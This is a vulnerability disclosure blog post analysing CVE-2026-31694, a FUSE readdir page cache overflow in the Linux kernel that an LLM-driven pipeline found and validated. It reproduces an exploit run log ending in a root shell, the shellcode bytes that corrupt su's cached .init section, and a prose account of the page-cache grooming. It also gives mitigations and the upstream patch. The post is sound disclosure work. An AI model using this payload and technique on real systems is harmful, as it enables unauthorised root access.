Discovery & Validation in the Linux Kernel (Part 2): FUSE Page Cache Overflow

Samuel Page

Last time we discussed the goal for this three-part series and analysed how our LLM-driven pipeline at Bynario was able to discover and validate CVE-2026-31532, a use-after-free in the Linux kernel's Controller Area Network (CAN) module.

In this part, we'll move on to another kernel bug our pipeline surfaced this month: CVE-2026-31694, a page cache overflow in the kernel's Filesystem in Userspace (FUSE) subsystem. We'll follow a similar format to part 1 by starting with a technical analysis of the vulnerability, then discuss validation, impact, remediation and wrap up with some final thoughts.

For this bug, the pipeline generated a working local privilege escalation, leveraging the page cache overflow primitive to gain root privileges on Ubuntu 26.04, which we'll explore too!

Our pipeline uses a mix of models, but for this case Opus 4.6 was the primary model involved in discovery and validation, highlighting how "older" models can still generate complex exploits when properly harnessed. The vulnerability was discovered while analysing the 7.0 Linux kernel; unless otherwise specified, all snippets refer to this version.

CVE-2026-31694: Page Cache Overflow in fs/fuse

Background

Filesystem in Userspace (FUSE) is a userspace filesystem framework. It consists of a kernel module (fuse.ko), a userspace library (libfuse.*) and a mount utility (fusermount) [4].

A key feature of FUSE is allowing secure, unprivileged mounts of user-defined filesystems. This is achieved by splitting filesystem logic between the kernel and a userspace process, with a well-defined communication channel.

At a high level, the kernel component (fuse.ko) registers a virtual filesystem and exposes a character device (/dev/fuse). When a FUSE filesystem is mounted, a FUSE "server" is created and becomes responsible for handling filesystem operations.

It does this via a bidirectional request–reply protocol over /dev/fuse, where:

  • the kernel acts as a client, issuing filesystem requests

  • the FUSE server/daemon acts as the server, implementing filesystem semantics.

So essentially the kernel carries out the filesystem tasks, as with any other filesystem, but it communicates with the FUSE server, which defines the implementation details for filesystem operations.

An example of such a filesystem operation is a userspace process calling getdents64(), the system call for fetching directory entries, on a FUSE directory.

In this case the kernel sends a request to the FUSE server for its directory entries, and the server replies with a buffer of struct fuse_dirent records, each of which looks like this:

// include/uapi/linux/fuse.h
struct fuse_dirent {
  uint64_t	ino;     // inode number
  uint64_t	off;     // offset for next entry
  uint32_t	namelen; // length of the name
  uint32_t	type;    // file type (regular, dir, etc.)
  char name[];       // filename (variable length)
};

The buffer is simply an array of these dynamically sized directory entries. To compute the size of a given record, and thus index the array, FUSE defines FUSE_DIRENT_SIZE():

// include/uapi/linux/fuse.h
#define FUSE_NAME_OFFSET offsetof(struct fuse_dirent, name)
#define FUSE_DIRENT_SIZE(d) \
	FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET + (d)->namelen)

We can see an example of the FUSE kernel code iterating over this buffer (buf) here:

// fs/fuse/readdir.c
static int parse_dirfile(char *buf, size_t nbytes, struct file *file,
			 struct dir_context *ctx)
{
	while (nbytes >= FUSE_NAME_OFFSET) {
		struct fuse_dirent *dirent = (struct fuse_dirent *) buf;
		size_t reclen = FUSE_DIRENT_SIZE(dirent);
		if (!dirent->namelen || dirent->namelen > FUSE_NAME_MAX)
			return -EIO;
		if (reclen > nbytes)
			break;
		if (memchr(dirent->name, '/', dirent->namelen) != NULL)
			return -EIO;

		if (!fuse_emit(file, ctx, dirent))
			break;

		buf += reclen;
		nbytes -= reclen;
		ctx->pos = dirent->off;
	}

	return 0;
}

Note that an entry's namelen is limited to 4095 as defined by FUSE_NAME_MAX:

// fs/fuse/fuse_i.h
/* maximum, but needs a request buffer > FUSE_MIN_READ_BUFFER */
#define FUSE_NAME_MAX (PATH_MAX - 1)

FUSE filesystems can influence kernel behaviour through flags and configuration options exchanged as part of the FUSE protocol. One such option is FOPEN_CACHE_DIR, which can be set by the FUSE server in response to an opendir request.

When this flag is enabled, the kernel caches directory entries returned by the FUSE server so that subsequent readdir operations can be handled by the kernel, without having to issue requests to the userspace FUSE server, via /dev/fuse, for cached entries.
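As a rough illustration of where this flag lives on the wire, the sketch below fills in the body of the reply a FUSE server would send for an opendir request. It assumes the UAPI header <linux/fuse.h> is installed and relies on its struct fuse_open_out and FOPEN_CACHE_DIR definitions; the helper name fill_opendir_reply() is hypothetical, and a real server would still need to prepend a struct fuse_out_header and write the reply to /dev/fuse.

```c
#include <assert.h>
#include <linux/fuse.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical helper: build the body of a FUSE_OPENDIR reply that asks the
 * kernel to cache directory entries for this open directory.
 */
static void fill_opendir_reply(struct fuse_open_out *out, uint64_t fh)
{
	assert(out != NULL);
	memset(out, 0, sizeof(*out));
	out->fh = fh;                       /* server-chosen directory handle */
	out->open_flags = FOPEN_CACHE_DIR;  /* enable kernel readdir caching */
}
```

Servers built on libfuse normally set this through the library rather than by filling the structure by hand.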

FUSE's directory caching is implemented by copying the parsed struct fuse_dirent records into the kernel's page cache.

The page cache is an in-memory cache for filesystem data; for example, when a file is first read from disk, its contents are stored in the cache. Typically, reads and writes go through the page cache first before falling back to slower disk access. As the name suggests, it is organised into fixed-size memory "pages", typically 4096 bytes (PAGE_SIZE) on x86_64 systems.

FUSE's directory caching implementation allows multiple directory entries to be cached within a single page, but any single entry must fit within a single page.

Analysis

With (hopefully) sufficient background covered, let's take a look at the vulnerability, which lies in fuse_add_dirent_to_cache(). This function is responsible for adding a directory entry to the page cache, when using the FOPEN_CACHE_DIR flag:

// fs/fuse/readdir.c
static void fuse_add_dirent_to_cache(struct file *file,
				     struct fuse_dirent *dirent, loff_t pos)
{
	struct fuse_inode *fi = get_fuse_inode(file_inode(file));
	size_t reclen = FUSE_DIRENT_SIZE(dirent);  // [1]
	pgoff_t index;
	struct page *page;
	loff_t size;
	u64 version;
	unsigned int offset;
	void *addr;

	spin_lock(&fi->rdc.lock);
	/*
	 * Is cache already completed?  Or this entry does not go at the end of
	 * cache?
	 */
	if (fi->rdc.cached || pos != fi->rdc.pos) {
		spin_unlock(&fi->rdc.lock);
		return;
	}
	version = fi->rdc.version;
	size = fi->rdc.size;
	offset = size & ~PAGE_MASK;
	index = size >> PAGE_SHIFT;
	/* Dirent doesn't fit in current page?  Jump to next page. */
	if (offset + reclen > PAGE_SIZE) {      // [2]
		index++;
		offset = 0;                         // [3]
	}
	spin_unlock(&fi->rdc.lock);

	if (offset) {
		page = find_lock_page(file->f_mapping, index);
	} else {
		page = find_or_create_page(file->f_mapping, index,
					   mapping_gfp_mask(file->f_mapping));
	}
	if (!page)
		return;

	spin_lock(&fi->rdc.lock);
	/* Raced with another readdir */
	if (fi->rdc.version != version || fi->rdc.size != size ||
	    WARN_ON(fi->rdc.pos != pos))
		goto unlock;

	addr = kmap_local_page(page);
	if (!offset) {
		clear_page(addr);
		SetPageUptodate(page);
	}
	memcpy(addr + offset, dirent, reclen);  // [4]
	kunmap_local(addr);
	fi->rdc.size = (index << PAGE_SHIFT) + offset + reclen;
	fi->rdc.pos = dirent->off;
unlock:
	spin_unlock(&fi->rdc.lock);
	unlock_page(page);
	put_page(page);
}

Note that reclen [1] is derived from FUSE_DIRENT_SIZE(dirent), where dirent is supplied by the FUSE server, i.e. userspace, and is therefore attacker-controlled.

Let's have another look at how FUSE_DIRENT_SIZE(dirent) calculates the length here:

  • FUSE_DIRENT_SIZE(dirent) = FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET + dirent->namelen)

  • Where FUSE_NAME_OFFSET, the offset of the name field, is 24 bytes

  • And FUSE_DIRENT_ALIGN aligns records to 8 bytes

  • dirent->namelen as we saw is capped by FUSE_NAME_MAX, which is 4095 bytes

  • This makes the maximum reclen = FUSE_DIRENT_ALIGN(24 + 4095) = 4120

In other words, it is possible for a malicious FUSE server to supply a directory entry with a reclen > PAGE_SIZE on systems with 4096 byte pages.
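The arithmetic above can be checked with a small userspace sketch. The struct and macro names below (fuse_dirent_sketch, SKETCH_NAME_OFFSET, SKETCH_ALIGN, sketch_reclen) are stand-ins invented for this example; they mirror the UAPI definitions rather than include them, so treat this as a model of the calculation, not kernel code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userspace mirror of struct fuse_dirent, for illustration only. */
struct fuse_dirent_sketch {
	uint64_t ino;
	uint64_t off;
	uint32_t namelen;
	uint32_t type;
	char name[];
};

/* Offset of the name field: 8 + 8 + 4 + 4 = 24 bytes. */
#define SKETCH_NAME_OFFSET offsetof(struct fuse_dirent_sketch, name)

/* Round up to a multiple of 8 bytes, as FUSE_DIRENT_ALIGN does. */
#define SKETCH_ALIGN(x) \
	(((x) + sizeof(uint64_t) - 1) & ~(sizeof(uint64_t) - 1))

/* Serialized record length for a name of `namelen` bytes. */
static size_t sketch_reclen(uint32_t namelen)
{
	return SKETCH_ALIGN(SKETCH_NAME_OFFSET + namelen);
}
```

Under this model, sketch_reclen(4095) evaluates to 4120, and the longest name that still fits in a 4096-byte page is 4072 bytes (24 + 4072 = 4096).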

If we go back to fuse_add_dirent_to_cache(), we see it handles the case where a dirent doesn't fit in the remaining space of the current page [2]:

	/* Dirent doesn't fit in current page?  Jump to next page. */
	if (offset + reclen > PAGE_SIZE) {      // [2]
		index++;
		offset = 0;                         // [3]
	}
	// ...
	addr = kmap_local_page(page);
	if (!offset) {
		clear_page(addr);
		SetPageUptodate(page);
	}
	memcpy(addr + offset, dirent, reclen);  // [4]

However, in this case it assumes the dirent will fit into a fresh page, so it resets the offset [3] and proceeds to copy reclen bytes into the new page [4]. With a reclen of 4120 bytes, this leads to a 24-byte (4120 - PAGE_SIZE) overflow past the end of the page cache page.
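To make the flaw concrete, here is a minimal userspace model of the placement decision. It assumes a 4096-byte page and reproduces only the offset logic; sim_overflow_bytes() and SIM_PAGE_SIZE are names made up for this sketch, and none of the locking or page lookup from the real function is modelled.

```c
#include <assert.h>
#include <stddef.h>

#define SIM_PAGE_SIZE 4096u

/*
 * Model of the placement decision in fuse_add_dirent_to_cache().
 * `cache_size` plays the role of fi->rdc.size. Returns how many bytes the
 * copy would write past the end of the destination page (0 if it fits).
 */
static size_t sim_overflow_bytes(size_t cache_size, size_t reclen)
{
	size_t offset = cache_size % SIM_PAGE_SIZE;

	assert(reclen > 0);

	/* Dirent doesn't fit in current page? Jump to next page. */
	if (offset + reclen > SIM_PAGE_SIZE)
		offset = 0;

	/* The copy covers [offset, offset + reclen) of a single page. */
	if (offset + reclen > SIM_PAGE_SIZE)
		return offset + reclen - SIM_PAGE_SIZE;
	return 0;
}
```

In this model any record of at most 4096 bytes yields 0 regardless of the current cache size, while a 4120-byte record yields 24 no matter where the cache currently ends, which matches the deterministic overflow size described above.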

Validation

So, how did our pipeline validate this vulnerability was really there? By popping a root shell of course! In this section, I'm going to explore the approach the validator took to leverage this 24 byte page cache overflow into a local privilege escalation (LPE) on Ubuntu 26.04.

$ uname -a
Linux fuse-test 7.0.0-14-generic #14-Ubuntu SMP PREEMPT_DYNAMIC Mon Apr 13 11:09:53 UTC 2026 x86_64 GNU/Linux
$ id
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)
$ cat /etc/os-release | head -3
PRETTY_NAME="Ubuntu 26.04 LTS"
NAME="Ubuntu"
VERSION_ID="26.04"
$ ./exploit
=== FUSE LPE PoC ===
FUSE readdir page-cache overflow -> SUID binary corruption

[*] Running as uid=1000 gid=1000
[+] Target: /usr/bin/su (.init on page 3)
[*] Payload:  f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00
[*] Original: f3 0f 1e fa 48 83 ec 08 48 8b 05 c1 af 00 00 48 85 c0 74 02 ff d0 48 83

[*] Creating 48 sacrificial files...
[*] Priming page cache (24 rounds)...
[*] Page cache primed

[*] Starting exploit (up to 512 attempts, sweeping PCP pad 0..6)...

[*] Attempt 1 (pad=0): miss (absorbed=0)
[*] Attempt 2 (pad=1): miss (absorbed=0)
[*] Attempt 3 (pad=2): miss (absorbed=0)
[*] Attempt 4 (pad=3): miss (absorbed=0)
[*] Attempt 5 (pad=4): miss (absorbed=0)
[*] Attempt 6 (pad=5): miss (absorbed=0)
[*] Attempt 7 (pad=6): miss (absorbed=0)
[*] Attempt 25 (pad=3): miss (absorbed=0)
[*] Attempt 42 (pad=6): HIT!

========================================
[!!!] .init PAGE CORRUPTED
========================================

[*] Corrupted: f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00 00

[*] Executing corrupted /usr/bin/su to verify LPE...

[+] LPE successful:
uid=0(root) gid=0(root) groups=0(root)
root

=== root shell ===
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Alright, there's a lot to unpack here (not least of which is the glaring lack of ASCII art). First, we get a brief overview of the technique being used here: "FUSE readdir page-cache overflow -> SUID binary corruption", so let's start by expanding on that.

The vulnerability allows us to overflow whatever physically follows our page cache page in memory with up to 24 bytes of attacker-controlled data. Naturally, other page cache pages are allocated via the same API so are likely nearby in memory, making them an easy target.

So what can these pages actually contain? What are we corrupting here? As discussed earlier, reads and writes go via the cache first. This includes binaries: when we execute a binary, we map it into memory and then execute it. These bytes are typically read from the cache copy first, so if we can corrupt the cache copy, we can execute these corrupted bytes.

I'm sure you can see where this is going! If we're able to corrupt the cached bytes of a Set User ID (SUID) binary, that runs with root privileges, we get a nice arbitrary code execution primitive. As we can see a bit later in the log, the validator uses /usr/bin/su for this:

[+] Target: /usr/bin/su (.init on page 3)
[*] Payload:  f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00
[*] Original: f3 0f 1e fa 48 83 ec 08 48 8b 05 c1 af 00 00 48 85 c0 74 02 ff d0 48 83

But what do we corrupt in order to get code execution with our 24 byte overflow, which allows us to corrupt the first 24 bytes of a cached page? The proof-of-concept (PoC) targets the .init section of the SUID ELF binary, which contains initialization code executed automatically by the dynamic linker before the program reaches main(). Perfect!
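The log line "(.init on page 3)" implies the PoC works out which page of the file holds .init. The PoC's own method is not shown in this post, so the following is only a sketch of one way to do it: walk the section headers of a 64-bit ELF file and return the file offset of a named section. It assumes a Linux system with <elf.h>, ignores extended section numbering, and elf64_section_offset() is a hypothetical helper name.

```c
#include <assert.h>
#include <elf.h>
#include <stdio.h>
#include <string.h>

/*
 * Return the file offset of the section called `wanted` in a 64-bit ELF
 * file, or -1 if the file cannot be parsed or has no such section.
 */
static long elf64_section_offset(const char *path, const char *wanted)
{
	Elf64_Ehdr eh;
	Elf64_Shdr strtab, sh;
	long result = -1;
	FILE *f;

	assert(path != NULL && wanted != NULL);
	f = fopen(path, "rb");
	if (!f)
		return -1;

	if (fread(&eh, sizeof(eh), 1, f) != 1 ||
	    memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
	    eh.e_ident[EI_CLASS] != ELFCLASS64 ||
	    eh.e_shentsize != sizeof(Elf64_Shdr) ||
	    eh.e_shstrndx >= eh.e_shnum)
		goto out;

	/* Load the header of the section-name string table. */
	if (fseek(f, (long)(eh.e_shoff + eh.e_shstrndx * sizeof(sh)), SEEK_SET) != 0 ||
	    fread(&strtab, sizeof(strtab), 1, f) != 1)
		goto out;

	for (unsigned int i = 0; i < eh.e_shnum; i++) {
		char name[64] = { 0 };

		if (fseek(f, (long)(eh.e_shoff + i * sizeof(sh)), SEEK_SET) != 0 ||
		    fread(&sh, sizeof(sh), 1, f) != 1)
			goto out;
		if (fseek(f, (long)(strtab.sh_offset + sh.sh_name), SEEK_SET) != 0)
			goto out;
		/* A short read is fine: section names are NUL-terminated. */
		if (fread(name, 1, sizeof(name) - 1, f) == 0)
			continue;
		if (strcmp(name, wanted) == 0) {
			result = (long)sh.sh_offset;
			break;
		}
	}
out:
	fclose(f);
	return result;
}
```

Dividing the returned offset by the page size gives the page cache index of the page holding the section, for example elf64_section_offset("/usr/bin/su", ".init") / 4096 on a 4 KiB-page system.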

static const uint8_t payload[CONTROLLED_BYTES] = {
	0xf3, 0x0f, 0x1e, 0xfa,        /* endbr64                        */
	0x31, 0xff,                     /* xor edi, edi       ; rdi = 0   */
	0x6a, 0x69,                     /* push 0x69                      */
	0x58,                           /* pop rax            ; rax = 105 */
	0x0f, 0x05,                     /* syscall            ; setuid(0) */
	0x6a, 0x6a,                     /* push 0x6a                      */
	0x58,                           /* pop rax            ; rax = 106 */
	0x0f, 0x05,                     /* syscall            ; setgid(0) */
	0xc3,                           /* ret                            */
	0x90, 0x90, 0x90, 0x90, 0x90,
};

We can see the payload used by the PoC simply calls setuid(0), setgid(0) then returns, with execution continuing as normal. Let's check the man page for su:

DESCRIPTION
       su allows commands to be run with a substitute user and group ID.

       When called with no user specified, su defaults to running an interactive
       shell as

Normally, running su as an unprivileged user to get a root shell requires authentication. However, as we've already set our user ID and group ID to root in the init, we bypass those checks and can jump straight to a root shell, ezpz.

However, anyone familiar with memory corruption and exploit development will know it's rarely as easy as simply placing the memory you want to corrupt where you want it.

There are a few considerations at play here:

  • We need to be mindful of noise: other parts of the kernel are going to be allocating memory at the same time we are, and we want to avoid corrupting the wrong memory.

  • We need to consider the page cache's implementation: how do we get our SUID binary added to and removed from the cache on demand from userspace?

So how did the validator go about tackling the memory feng shui required here?

To achieve LPE the page physically adjacent to the oversized, cached FUSE dirent must be the .init page of the target SUID binary, su in this case.

First, the validator creates a "sacrificial file pool" (its name choice) of temporary files, which are repeatedly faulted into (via pread) and evicted from (via posix_fadvise() with POSIX_FADV_DONTNEED) the page cache, creating a grouped set of "sprayed" cached pages.

At the same time, it repeatedly faults and evicts a two-page window around the target .init section - the .init page itself and the preceding page. The goal is to have our sacrificial pages and the su pages adjacent in memory.

Then, just before triggering the bug, the page prior to the .init page and several sacrificial pages (for padding) are evicted to create some holes in memory. When the bug is triggered, the oversized dirent page should land in one of these gaps, ideally the one immediately before the target .init page, allowing us to land our payload. Failing that, thanks to the sacrificial pages, we are likely to corrupt one of those instead of something important.
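The fault-and-evict primitive these steps rely on can be sketched with two standard POSIX calls. This is an illustrative building block only, not the validator's code: the function names are hypothetical, and POSIX_FADV_DONTNEED is a hint that the kernel may ignore for dirty, mapped or otherwise busy pages.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Read one byte at `off` so the page containing it is pulled into the page cache. */
static int fault_in_page(int fd, off_t off)
{
	char byte;

	assert(off >= 0);
	return pread(fd, &byte, 1, off) == 1 ? 0 : -1;
}

/*
 * Ask the kernel to drop cached pages in [off, off + len). This is only a
 * hint: dirty, mapped or otherwise busy pages may stay resident.
 */
static int evict_range(int fd, off_t off, off_t len)
{
	/* posix_fadvise() returns an error number directly, not -1/errno. */
	return posix_fadvise(fd, off, len, POSIX_FADV_DONTNEED) == 0 ? 0 : -1;
}

/* One priming round over a single page: fault it in, then evict it. */
static int prime_page(int fd, off_t off, off_t page_size)
{
	if (fault_in_page(fd, off) != 0)
		return -1;
	return evict_range(fd, off, page_size);
}
```

Calling prime_page() in a loop over a pool of file descriptors approximates the "priming" rounds seen in the log; how the real PoC orders and pads those calls is not covered here.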

Impact

The vulnerable code was introduced in commit 69e34551152a ("fuse: allow caching readdir") on 2018-10-01. That change added fuse_add_dirent_to_cache() and the current page cache packing logic. However, practical reachability depends on whether the kernel issues READDIR requests larger than one page.

Before commit dabb90391028 ("fuse: increase readdir buffer size", 2025-04-08), fuse_readdir_uncached() only allocated a PAGE_SIZE reply buffer, which prevents a 4120-byte malicious dirent from being accepted by the kernel at all. The vulnerability therefore first becomes practically reachable in v6.16-rc1.

The overflow size is deterministic (up to 24 bytes on 4 KiB pages) and the overflow contents are attacker-controlled bytes from the tail of the filename. Note that systems with a page size larger than 4 KiB are unaffected, as the 4120-byte malicious dirent fits within a single page.
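The two reachability conditions can be summarised as a small predicate. This is a simplified model: it treats the READDIR reply buffer size as the only gate on whether the maximum-size dirent is accepted, and the buffer sizes in the usage note are illustrative values rather than figures taken from the kernel. The names MAX_DIRENT_RECLEN and oversized_dirent_overflows() are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define MAX_DIRENT_RECLEN 4120u  /* FUSE_DIRENT_ALIGN(24 + 4095) */

/*
 * True when a maximum-size dirent can both reach the cache path (it fits in
 * the reply buffer, so parse_dirfile() does not stop at reclen > nbytes) and
 * overflow the destination page (it is larger than one page).
 */
static bool oversized_dirent_overflows(size_t reply_buf_size, size_t page_size)
{
	assert(page_size > 0);

	bool accepted = MAX_DIRENT_RECLEN <= reply_buf_size;
	bool too_big_for_page = MAX_DIRENT_RECLEN > page_size;

	return accepted && too_big_for_page;
}
```

With a one-page buffer on a 4 KiB system, oversized_dirent_overflows(4096, 4096) is false, which is the pre-dabb90391028 situation; with any buffer of at least 4120 bytes it becomes true on 4 KiB pages and stays false on 16 KiB or 64 KiB pages.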

On affected systems, an unprivileged local attacker can mount a FUSE filesystem (via unprivileged user namespaces or using fusermount3), return an oversized directory entry from the FUSE server, and trigger the vulnerable path via a getdents64() syscall.

Besides applying the patch below, this vulnerability, and the attack surface exposed by FUSE, can be limited by restricting access to FUSE if not required on your system.

  • On systems with fusermount3, you can strip the setuid bit via sudo chmod u-s /usr/bin/fusermount3 if it's not in use.

  • Ensure unprivileged namespaces are disabled or suitably restricted for your distribution (see the impact section of our last post for more on this).

Remediation

After validating the bug, the following patch was proposed and accepted upstream:

From 51a8de6c50bf947c8f534cd73da4c8f0a13e7bed Mon Sep 17 00:00:00 2001
From: Samuel Page <sam@bynar.io>
Date: Mon, 20 Apr 2026 11:01:37 +0200
Subject: [PATCH] fuse: reject oversized dirents in page cache

fuse_add_dirent_to_cache() computes a serialized dirent size from the
server-controlled namelen field and copies the dirent into a single
page-cache page. The existing logic only checks whether the dirent fits
in the remaining space of the current page and advances to a fresh page
if not. It never checks whether the dirent itself exceeds PAGE_SIZE.

As a result, a malicious FUSE server can return a dirent with
namelen=4095, producing a serialized record size of 4120 bytes. On 4 KiB
page systems this causes memcpy() to overflow the cache page by 24 bytes
into the following kernel page.

Reject dirents that cannot fit in a single page before copying them into
the readdir cache.

Fixes: 69e34551152a ("fuse: allow caching readdir")
Cc: stable@vger.kernel.org # v6.16+
Assisted-by: Bynario AI
Signed-off-by: Samuel Page <sam@bynar.io>
Reported-by: Qi Tang <tpluszz77@gmail.com>
Reported-by: Zijun Hu <nightu@northwestern.edu>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Link: https://patch.msgid.link/20260420090139.662772-1-mszeredi@redhat.com
Signed-off-by: Christian Brauner <brauner@kernel.org>
---
 fs/fuse/readdir.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/fs/fuse/readdir.c b/fs/fuse/readdir.c
index c2aae2eef0868b..aae657fd56c0ed 100644
--- a/fs/fuse/readdir.c
+++ b/fs/fuse/readdir.c
@@ -41,6 +41,10 @@ static void fuse_add_dirent_to_cache(struct file *file,
 	unsigned int offset;
 	void *addr;

+	/* Dirent doesn't fit in readdir cache page?  Skip caching. */
+	if (reclen > PAGE_SIZE)
+		return;
+
 	spin_lock(&fi->rdc.lock);
 	/*
 	 * Is cache already completed?  Or this entry does not go at the end of

Wrap-up

While the last part highlighted the discovery capabilities of LLMs, I think this vulnerability provides a good showcase of the kind of validation LLMs are capable of when properly orchestrated and harnessed, as demonstrated with an Ubuntu 26.04 LPE.

Automated validation is a difficult challenge to tackle. It's one thing to find suspicious code paths, but to determine whether this actually yields an exploitable primitive, and under what conditions or constraints, is often harder. However, it is an important one given the sharp increase in AI-generated vulnerability reports we're currently seeing across the industry.

Reducing that noise by demonstrating real, reproducible impact is an important step in using this new technology in a scalable, sustainable way.

In the final part of this series, I plan to spend some time evaluating how local models perform in vulnerability discovery and validation, using the two Linux kernel CVEs we've analysed in the first two parts as a case study.

BYNARIO s.r.l. | PIAZZA BORROMEO 12, 20129 MILAN, ITALY | VAT- IT14434720968

all rights reserved

2026
